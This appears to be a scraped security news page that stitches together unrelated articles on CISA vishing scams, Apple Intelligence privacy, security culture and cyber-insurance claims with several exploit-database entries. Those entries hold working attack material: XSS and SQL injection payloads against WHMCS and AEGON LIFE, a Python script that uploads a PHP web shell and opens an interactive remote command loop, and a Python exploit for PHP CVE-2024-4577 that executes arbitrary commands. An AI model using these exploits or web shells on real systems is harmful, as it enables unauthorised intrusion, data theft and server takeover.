The cybersecurity agency issued a warning not to agree to any payment requests and to alert law enforcement or CISA after being contacted.

Source: Brian Jackson via Alamy Stock Photo

The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert this week warning that malicious actors have been making phone calls claiming to be representatives from the organization, and making requests for cash, gift card, or cryptocurrency transfers.

"Impersonation scams are on the rise and often use the names and titles of government employees," CISA explained in the brief advisory. "As a reminder, CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret."

The CISA did not offer additional details as to whom might be perpetrating the voice phishing ("vishing") fraud attempts, but advised anyone who is contacted in such a scheme to deny the request for payment, make note of the phone number and hang up immediately.

Those contacted were also asked to report the incident to law enforcement and reach out to CISA by calling (844) SAY-CISA (844-729-2472).

The perpetrators might aim to fund further criminal activities or simply profit from the immediate financial returns of their deceitful tactics, says Ezra Graziano, director of federal accounts at Zimperium.

"Such scams can be orchestrated by organized cybercriminal groups or individual actors seeking to exploit people's trust in government agencies," he said. "This incident highlights the evolving tactics of cybercriminals, who are increasingly using sophisticated social engineering techniques to exploit trust in government agencies."

He added the fact that scammers are impersonating CISA employees underscores the urgency for individuals and organizations to be vigilant.

"It also reflects the broader trend of targeted phishing attacks where fraudsters aim to exploit the authority and credibility of well-known institutions," Graziano said.

Other government agencies impacted by impersonation scams include the FBI and its Internet Crime Complaint Center, which has been targeted as far back as 2018.

Beyond impersonation of government officials and agencies, malicious actors are also targeting brands by setting up scam sites aping those of legitimate businesses to sell counterfeit goods or process payments without sending the product.

These types of scams have cost consumers more than $2 billion since 2017, according to the US Federal Trade Commission (FTC).

**Education, Training Helps Prepare for Vishing**

Sean McNee, head of research for DomainTools, said the most important thing employers can do is educate employees about various types of scams, how they work, and how to recognize them.

"This includes understanding tactics used by scammers, such as impersonation, social engineering, and phishing," he says.

For instance, employees should be suspect of unsolicited calls or emails, verify the identity of unknown or new callers, and be wary of unusual requests for sensitive information.

He explains that phone-based scams work by creating a false sense of urgency to manipulate the receiver to take actions they normally wouldn’t take.

"Understanding this … helps reduce its effectiveness," McNee says.

Patrick Harr, CEO of SlashNext Email Security+, points out that impersonation scams have long been a tool of scammers whereby they impersonate high-value individuals, such as executives, CEOs, or other high-value targets and sometimes what can be perceived as scary agencies, such as the IRS. He predicts that scams like these will only increase with the weaponization of AI generated voice, video and text.

Thus, from Harr's perspective, any good cyber defense is a multi-layered defense against scams, phishing, business email companies and other socially engineered attacks.

"Firstly, ensure businesses have multifactor authentication (MFA), password change control, AI based email and messaging security and detection and monitoring in place," he cautions. "Companies, organizations, and individuals must employ AI themselves to fight these scams, otherwise we will see continued success."

Don't miss "Anatomy of a Data Breach: What to Do if It Happens to You," a free Dark Reading virtual event scheduled for June 20! Speakers include Verizon's Alex Pinto, execs from Snowflake, pharma giant GSK, Salesforce, and more — register today!

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Widespread Vishing Effort Impersonates CISA Staff

Premium Support Tickets For WHMCS version 1.2.10 suffers from a cross site scripting vulnerability.

    Exploit Title: Premium Support Tickets For WHMCS Reflected XSSExploit Author: Sajibe KantiVendor: ModulesGardenVendor Homepage:https://www.modulesgarden.com/products/whmcs/premium-support-ticketsProduct Name: Premium Support Tickets For WHMCSProduct Version: v1.2.10Tested Version: WHMCS 8.10.1Tested on: Windows 10Vulnerabilities Discovered Date: 29/04/2024Description:The Premium Support Tickets For WHMCS plugin by ModulesGarden is vulnerableto a reflected cross-site scripting (XSS) attack. This vulnerability allowsan attacker to inject malicious JavaScript code into the "error&msg="parameter of the submitticket.php page, leading to the execution ofarbitrary code in the context of the victim's browser.Proof of Concept (POC):1. Identify a website that utilizes the Premium Support Tickets For WHMCSplugin by ModulesGarden.2. Navigate to the ticket submission page (submitticket.php).3. Select any department to open a new ticket.4. If you lack support credit points, you will receive an error messagewith the parameter "error&msg=clientarea_message_cantcreateinthisdept".5. Inject your payload into the "error&msg=" parameter.6. Construct the following URL with your payload:https://example.com/submitticket.php?PremiumSupportTickets=error&msg=%22/%3E%3CsvG%20onLoad=alert(/xss/)%3E7. Replace the payload with your desired XSS payload:   "<svg/onLoad=alert(/OPENBUGBOUNTY/)>"8. Visit the modified URL in your browser.9. Observe the XSS popup indicating successful exploitation of thevulnerability.Impact:Successful exploitation of this vulnerability could allow an attacker toexecute arbitrary JavaScript code in the context of an authenticated user'sbrowser session. This could lead to various attacks, including but notlimited to:- Theft of sensitive information (session cookies, credentials, etc.)- Phishing attacks targeting users of the affected WHMCS instance- Defacement of the website or redirection to malicious content- Browser-based attacks such as keylogging or screen capturingNote: This exploit is for educational purposes only. Unauthorized access toor modification of systems is illegal and unethical. Always obtain properauthorization before testing or exploiting vulnerabilities.

Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

AEGON LIFE 1.0 Cross Site Scripting

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

AEGON LIFE 1.0 Remote Code Execution

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.

    # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______   / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  | | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /  | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /   | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /     \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                                                                                                                                                                                                                                  Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py    ''')   def exploit(url, command):           payloads = {        '<?php echo "vulnerable"; ?>',        '<?php echo shell_exec("'+command+'"); ?>'     }        headers = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',    'Content-Type': 'application/x-www-form-urlencoded'}    s = Session()    for payload in payloads:        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"        req = Request('POST', url, data=payload, headers=headers)        prepped = req.prepare()        del prepped.headers['Content-Type']        resp = s.send(prepped,        verify=False,        timeout=15)        #print(prepped.headers)        #print(url)        #print(resp.headers)               #print(payload)        print(resp.status_code)        print(resp.text)if __name__ == '__main__':    title()    if(len(sys.argv) < 2):        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))                exit(0)    else:        exploit(sys.argv[1],sys.argv[2])

PHP Remote Code Execution

An analysis of a hybrid biometric access system from Chinese manufacturer ZKTeco has uncovered two dozen security flaws that could be used by attackers to defeat authentication, steal biometric data, and even deploy malicious backdoors.
"By adding random user data to the database or using a fake QR code, a nefarious actor can easily bypass the verification process and gain unauthorized access,"

ZKTeco Biometric System Found Vulnerable to 24 Critical Security Flaws

Apple's guarantee of privacy on every AI transaction could influence trustworthy AI deployments.

Source: OleCNX via Alamy Stock Photo

Apple has long styled itself as the company that cares about privacy, and it continues to tout its privacy bona fides with Apple Intelligence.

At this week's Worldwide Developer Conference, the company announced Apple Intelligence, its secure AI system, and plans to integrate AI across its devices and applications. The AI features will be used to upgrade personal assistant features in Apple devices and provide assistance with writing and image manipulation.

While a lightweight AI model runs locally on Apple devices, more complex queries will go to the cloud. Apple will assess the complexity and computing power required by an AI query and decide whether to process it on device or send it to the cloud. Data won’t leave the device if it is processed on device, and layers of security protect the information sent to the cloud.

Within this secure AI system, user data is not visible to anyone, even Apple, and is deleted once a query is answered, the company said.

"Your data is never stored or made accessible to Apple. It's used exclusively to fulfill your request," said Craig Federighi, senior vice president of software engineering at Apple, during a WWDC keynote.

**Trusted AI Deployments?**

Apple's guarantee of privacy on every AI transaction — whether on-device or in the cloud — is ambitious and could influence trustworthy AI deployments.

Apple's hardware and software implementation to guarantee privacy on every AI transaction sets a high bar on zero-trust infrastructure that competitors may try to match, says James Sanders, an analyst at chip research firm TechInsights.

Sanders notes there is a "growing trust problem" with LLMs, especially as top AI providers collect information from users to train large-language models or improve services. Google collects user data from across its vast portfolio of products to boost its capabilities. It also includes human reviewers to evaluate answers with the ultimate goal to improve its Gemini AI service.

Apple did not announce its own AI infrastructure and instead will be integrating with OpenAI. Apple left open the possibility of working with others as well. Users will be prompted to agree to send user data to OpenAI.

"I do wonder to what extent this is going to put pressure on Microsoft to adopt a similar method," Sanders says.

**Building an AI Walled Garden**

As part of its investments, the company has built a trustworthy cloud infrastructure called Private Compute Cloud with new servers and chips to handle AI queries that demand more computing power. Apple's secure boot and secure enclaves protect data.

"These models run on servers … specially created using Apple silicon. These Apple silicon servers offer the privacy and security of your iPhone from the silicon on up," Apple’s Federighi said.

Private data can be easily stolen en route or from the cloud, but Apple is using the latest hardware and software techniques to protect the data, said Matthew Green, associate professor at Johns Hopkin’s computer science department. Apple devices generate encryption keys, which authenticates devices and cloud connections. The request is then sent to a secure enclave on Apple's servers, where the requests are processed.

Apple is also taking a serverless approach in which data is deleted once the answer is sent back. New keys are generated each time a system reboots. The operating system also has an attestation system to verify users and software images.

"Specifically, it signs a hash of the software and shares this with every phone/client. If you trust this infrastructure, you'll know it's running a specific piece of software," Green said.

Apple controls nearly every major piece of software and hardware in its infrastructure, which makes it easier for them to build a strong privacy wall around its AI service, said Alex Matrosov, CEO of security company Binarly.io.

“I really liked how they frame all the requirements and specifically use their own silicon. Once they control everything, they can guarantee the chain of trust from the silicon to the cloud,” Matrosov said.

Rival providers don’t have nearly the same level of control over their AI infrastructure. Unlike Apple, they can’t lock down security as queries pass through various hardware and software layers, Matrosov says. For example, OpenAI and Microsoft process queries through GPUs from Nvidia, which handles vulnerability discovery and patching.

"If Apple sets the standard, the effect will be 'why I should buy Android if I don’t care about the privacy.' The next step will be Google following up and trying to maybe implement or do the similar thing," Matrosov said.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Apple's AI Offering Makes Big Privacy Promises

Creating and nurturing a corporate environment of proactive cybersecurity means putting people first — their needs, weaknesses, and skills.

Ken Deitz, CSO/CISO, Secureworks

June 13, 2024

5 Min Read

Source: Washington Imaging via Alamy Stock Photo

COMMENTARY

"Underneath every simple, obvious story about 'human error,' there is a deeper, more complex story about organization."  
— Sidney Dekker, The Field Guide to Understanding Human Error

In my experience, culture trumps strategy when building and maintaining robust cyber defenses. It's a self-evident truth that in cybersecurity, all roads lead back to people. At its heart, security is a human problem — one that needs a human-centric solution. That's what makes culture so crucial.

It's often said that it's not the situation that defines us but how we respond. If the worst happens and your company suffers a breach, your security culture will be on the global stage. It will be your north star guiding how you communicate, engage, and respond to all stakeholders. If your culture is lacking, it will inhibit your long-term cyber maturity and fracture trusted relationships. Trust and security exist in a delicate balance, and culture is the glue that binds them together.

During my career I've learned valuable lessons about the core pillars of security culture and how to not only create a good one, but nurture it as well.

**1\. Establish the Right Mindset**

First, mindset matters. I've worked with organizations where the focus has been on everything that an employee can't or shouldn't do. Let's be honest: That's an overwhelming list that, even with the best of intentions, people aren't going to remember or be able to practically integrate into their working days. Instead, I suggest flipping the script — what are the positive actions people can and should take?

For example, if someone at Secureworks gets an email that they are unsure about, they can just send it over to our designated threat team for investigation. The threat team then comes back to let our teammate know whether it's OK. Regardless, the threat team always starts their response with the same two words: "thank you." Cybersecurity is a team sport, and each of us plays a part. It's important to recognize that in all of its forms. That "thank you" also provides encouragement to remain curious and vigilant.

**2\. Engage With Empathy**

A productive and inclusive security culture is one that shuns blame. A culture of blame is counterproductive and makes your teammates feel powerless — the exact opposite of how you want them to feel. If someone clicks, scans, or interacts with something they shouldn't, you need to know as soon as possible. If your culture points fingers and makes people feel shame, the chances are they'll either procrastinate about telling you or not tell you at all, and the first you'll know about it is when red lights start flashing. Cybercriminals take advantage of people, so don't double the impact with victim-shaming or making an example of the person. Instead, focus on what you can collectively learn from the incident to enrich your cyber strategy for the future.

**3\. Communicate, Communicate, Communicate**

When it comes to cybersecurity, there's no such thing as too much communication. Just because you've sent an email or mentioned something in a company all-hands meeting doesn't mean that the message has gotten across. People have a lot going on in their jobs and lives. Meet people where they are, and you'll have much better results.

First, do an audit of the communication channels that your business has — intranet, Viva Engage, Slack, Teams, email, team and company meetings, etc. — and devise a communications strategy. Which messages resonate best across which channels? If you're giving an update on a strategic initiative, a 10-minute slot in the company all-hands could be the appropriate forum. But if you're aware of an active QR phishing email campaign, you likely want to reach all employees as quickly as possible, so you might use a combination of email and internal message boards.

It's not just about matching the right message to the right channel, but the person as well. If I were the only person to talk to our Secureworks teammates about cybersecurity, it would be easy to zone me out. That's why we empower all leaders to talk about security in their team meetings and why our CEO underscores our investments in this area during company meetings. Different people bring different perspectives, and that's crucial to conveying the importance of cybersecurity.

**4\. Stay on Your Toes**

New and emerging technologies bring opportunities and challenges. Generative artificial intelligence (AI), for example, can offer teammates productivity gains. But if you don't create a safe playground for them, they'll develop their own ways to access and engage with these tools. This, again, comes back to meeting people where they are. We've made it easy to interact with and use AI within a safe environment that we've built. It's a win-win situation.

The threat landscape evolves rapidly. Deepfakes, for example, are becoming more advanced and therefore have the potential to cause damage. Typically, they cultivate a false sense of urgency aimed at panicking people into taking action, such as transferring a large volume of money. Cybercriminals are looking to manipulate the dynamic between the executive they are impersonating and the employee. That's why it's so important we encourage people to question the situation and give them access to simple tools that let them validate the identity of the person they're talking to.

**Cybersecurity Is a Team Sport**

What I've outlined above doesn't happen in isolation. You need to work across many different functions within the business — from HR and communications through to legal and beyond. Be clear about your shared objective with these teams: why you would like their support and the impact you believe working together will have. Share your plans and show them why their teams are so integral to the plan's success. A shared goal galvanizes the whole business.

And so we find ourselves back at the beginning, with trust and security. A good cybersecurity culture trusts and empowers teammates to make good decisions. In turn, that trust fuels a more productive relationship between cybersecurity and the business. Culture is a living entity that needs to be continuously nurtured. Give it the dedication it needs, and your businesses will be safer as a result.

**About the Author(s)**

CSO/CISO, Secureworks

Ken Deitz serves as chief security officer and CISO at Secureworks, working his way up from director of corporate incident response team. He served in the US Navy as a lead analyst in global network exploitation, then became a senior information security analyst at Advanced Concepts, Inc. He worked as branch chief of fusion cell at United States Cyber Command until he joined Secureworks in 2011.

4 Ways to Help a Security Culture Thrive

More claims are being made across the US and Canada compared with previous years, with healthcare organizations leading the way.

Source: Sarayut Thaneerat via Alamy Stock Photo

According to insurance broker Marsh, cyber-insurance claims reached record highs in 2023 with over 1,800 cyber claims sent in from the US and Canada.

The uptick is reportedly due to the sophistication of cyberattacks, privacy claims, a growing number of organizations purchasing cyber insurance, and the scope of the MOVEit file transfer supply chain breach.

Of all the claims made, healthcare came out on top with 17%, followed closely by communications (16%), education (9%), retail/wholesale (8%), and lastly financial institutions (8%).

Some 282 clients reported experiencing at least one cyber-extortion event in 2023, an increase from 2022, when only 172 clients reported these kinds of activities. Median extortion payments went up in tandem in 2023 compared with 2022, rising from $335,000 to around $6.5 million. Extortion demands made by the threat actors rose from $1.4 million to $20 million during this same time period.

Overall, Marsh reports of worsening cyber conditions due to the increasing activity of threat actors, but it did note that negotiating extortion payments proved to be effective in reducing the final ransom payment and the percentage of companies that paid a ransom at all fell to 23% in 2023 from 30% in 2022. 

**About the Author(s)**

Tag

#auth